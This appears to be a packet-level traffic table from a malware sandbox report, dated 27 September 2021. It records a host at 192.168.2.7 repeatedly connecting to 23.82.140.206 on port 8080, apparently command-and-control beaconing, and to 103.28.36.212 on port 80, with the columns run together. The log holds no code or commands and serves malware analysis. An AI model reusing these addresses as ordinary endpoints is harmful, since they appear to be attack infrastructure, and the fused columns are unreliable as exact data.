                                          Sep 27, 2021 20:26:31.948004007 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.078443050 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.080216885 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.080543995 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.206391096 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.206609011 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.207266092 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.210356951 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.334048033 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.337039948 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.338741064 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.338763952 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.338778019 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.338799000 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.338816881 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.338829994 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.338957071 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.339041948 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.340123892 CEST498568080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.465961933 CEST80804985623.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.599284887 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.731453896 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.731616974 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.732357979 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.864794970 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.866010904 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.866118908 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.998481989 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:32.998650074 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:32.999218941 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.003957987 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.129961967 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.134993076 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.136816978 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.136843920 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.136864901 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.136890888 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.136933088 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.136951923 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.137032986 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.137095928 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.138571024 CEST498578080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.269138098 CEST80804985723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.396078110 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.529257059 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.529357910 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.530365944 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.661139965 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.663482904 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.680510044 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.811465025 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.811568022 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.812032938 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.814557076 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.943425894 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.945255041 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.947798967 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.947834015 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.947860003 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.947882891 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.947906017 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.947923899 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:33.947949886 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.948005915 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:33.948859930 CEST498588080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.081350088 CEST80804985823.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.209199905 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.334038973 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.334178925 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.336272955 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.346854925 CEST4985580192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:34.472819090 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.476490021 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.482819080 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.609010935 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.609118938 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.609568119 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.612052917 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.618110895 CEST8049855103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:34.618230104 CEST4985580192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:34.618367910 CEST4985580192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:34.618431091 CEST4985580192.168.2.7103.28.36.212
                                          Sep 27, 2021 20:26:34.733911991 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.737211943 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.737839937 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.737977028 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.738040924 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.738080978 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.738099098 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.738109112 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.738121033 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.738141060 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.738157988 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.738168001 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.738185883 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.738205910 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.738753080 CEST498598080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:34.868846893 CEST80804985923.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:34.889991999 CEST8049855103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:34.930154085 CEST8049855103.28.36.212192.168.2.7
                                          Sep 27, 2021 20:26:34.989974022 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.123195887 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.123313904 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.124196053 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.251256943 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.253205061 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.253314018 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.378442049 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.378561974 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.385265112 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.388122082 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.510446072 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.513377905 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.514131069 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.514205933 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.514301062 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.514327049 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.514349937 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.514362097 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.514413118 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.514470100 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.514518976 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.514569044 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:35.514617920 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.527401924 CEST498608080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:35.652534962 CEST80804986023.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.102776051 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.237775087 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.237885952 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.301507950 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.433264971 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.433296919 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.433434010 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.565542936 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.565665960 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.573613882 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.577636957 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.705399036 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.710782051 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.711482048 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.711513042 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.711596966 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.711621046 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.711642981 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.711647034 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.712429047 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:36.712532043 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:36.712551117 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:37.231859922 CEST498618080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:37.364186049 CEST80804986123.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:37.617419958 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:37.749485970 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:37.749623060 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:37.754086018 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:37.885709047 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:37.885798931 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:37.885940075 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.017693996 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.019889116 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.102716923 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.105319977 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.234649897 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.237025976 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.239013910 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.239135027 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.239249945 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.239296913 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.239309072 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.239315987 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.239337921 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.239368916 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.239382029 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.239394903 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:38.239433050 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:38.239454031 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.039601088 CEST498628080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.171060085 CEST80804986223.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.470340967 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.597368956 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.597466946 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.599427938 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.726521015 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.727050066 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.727143049 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.853292942 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.853368998 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.853790998 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.856374025 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.979571104 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.984855890 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.984886885 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.984910965 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.984934092 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.984960079 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.984982967 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.984998941 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:39.985008001 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.985048056 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:39.985692978 CEST498638080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.112379074 CEST80804986323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.249771118 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.382503986 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.382621050 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.388627052 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.520770073 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.520802021 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.521039009 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.652622938 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.652733088 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.654551029 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.657241106 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.785609007 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.788125038 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.789827108 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.789902925 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.789959908 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.789983988 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.790142059 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.790167093 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.790239096 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.790261984 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.790297031 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.790316105 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:40.790364027 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.790375948 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.795236111 CEST498648080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:40.925931931 CEST80804986423.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.129045963 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.254558086 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.254818916 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.275418043 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.400813103 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.400928974 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.403300047 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.529696941 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.529828072 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.530348063 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.533206940 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.655750990 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.658694983 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.659323931 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.659435034 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.659463882 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.659499884 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.659576893 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.659579039 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.659605980 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.659626007 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.659636974 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.659686089 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.660402060 CEST498658080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:41.787391901 CEST80804986523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:41.913084030 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:44.925467014 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.057570934 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.057666063 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.058480024 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.190084934 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.192311049 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.192397118 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.323892117 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.324645042 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.324887991 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.326875925 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.457621098 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.459310055 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.460526943 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.460692883 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.460797071 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.460825920 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.460848093 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.460867882 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.460884094 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.460922003 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.460967064 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.461544991 CEST498678080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.594074965 CEST80804986723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.709023952 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.835515976 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.835624933 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.836410046 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:45.961292028 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.963865042 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:45.963984966 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.088895082 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.088979959 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.089457035 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.092482090 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.214298964 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.218358040 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.219671011 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.219696045 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.219716072 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.219733953 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.219748974 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.219762087 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.219808102 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.219839096 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.220973969 CEST498838080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.346239090 CEST80804988323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.489993095 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.621623993 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.621731043 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.622287035 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.754988909 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.757920980 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.758037090 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.889724016 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:46.891747952 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.892935038 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:46.895160913 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.024451017 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.028490067 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.029824018 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.029917002 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.029956102 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.030086040 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.030628920 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.030659914 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.030679941 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.030694008 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.030706882 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.030755997 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.031457901 CEST498858080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.163491011 CEST80804988523.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.287878990 CEST498878080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.413285971 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.413691044 CEST498878080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.414726973 CEST498878080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.540627956 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.542733908 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.543147087 CEST498878080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.670258999 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.670571089 CEST498878080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.670929909 CEST498878080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.672939062 CEST498878080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:26:47.795929909 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.797903061 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.799737930 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.799773932 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.799797058 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.799820900 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.799841881 CEST80804988723.82.140.206192.168.2.7
                                          Sep 27, 2021 20:26:47.799863100 CEST80804988723.82.140.206192.168.2.7
